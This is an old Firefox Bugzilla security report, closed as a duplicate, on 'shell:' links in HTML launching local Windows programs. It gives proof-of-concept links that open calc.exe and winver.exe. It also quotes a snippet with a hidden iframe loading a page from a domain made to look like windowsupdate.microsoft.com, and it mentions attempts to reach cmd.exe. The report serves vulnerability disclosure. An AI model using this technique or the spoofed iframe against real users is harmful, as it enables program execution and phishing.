Closed Bug 250356 Opened 17 years ago Closed 17 years ago

Mozilla / Firefox will execute local programs in the system32 dir using the shell: code in html

Categories

(Firefox :: Shell Integration, defect)

x86
Windows XP
defect
Not set
critical

Tracking

()

VERIFIED DUPLICATE of bug 250180

People

(Reporter: Perrymonj, Assigned: bugs)

Details

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1

-----snip------ 
center><br><br><img src="nocigar.gif"></center> 
<center>
<a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe
src="http://windowsupdate.microsoft.com%2F.http-
equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none">
[customise as you see fit]
<http://www.malware.com/stockpump.html>
------end----------
The code above has interest to me. 
Even in Mozilla the commands below will work.

<a href=shell:windows\\system32\\calc.exe>1</a>
<a href=shell:windows\system32\calc.exe>2</a>
<a href=shell:windows\system32\winver.exe>4</a>

Just save them to an .html file and run it.
The first one with the double quotes was from bugtraq: 
Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash 
<http://seclists.org/lists/bugtraq/2004/Mar/0188.html>
The links below that will run calc as well as winver. 
It seems it calls windows as a virtual dir because c:\winxp is what I have.
I have been playing around to see if cmd.exe will work with it but without luck.
This is what is in the registry.
HKEY_CLASSES_ROOT\Shell
Look in the registry key above. You will find the shell object calls Windows
Explorer with a particular set of arguments. 
%SystemRoot%\Explorer.exe /e,/idlist,%I,%L



Basically, I have been able to call several programs from the /system32 in
mozilla using the shell: call. This could easily be exploited with a BO if
passed to the correct local program.



Reproducible: Always
Steps to Reproduce:
1.<a href=shell:windows\system32\calc.exe>2</a>

2.<a href=shell:windows\system32\winver.exe>4</a>
3.

Actual Results:  
After clicking on the links above in XP / Firefox 1.9 the specified applications
are launched.

Expected Results:  
Mozilla should possibly blasklist the shell: protocol????
Already public and fixed.

*** This bug has been marked as a duplicate of 250180 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 17 years ago
Resolution: --- → DUPLICATE
thank you for your report, in the future if you could report it to us a day
before you mention it to full-disclosure instead of the other way around, that'd
be nice. :)
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.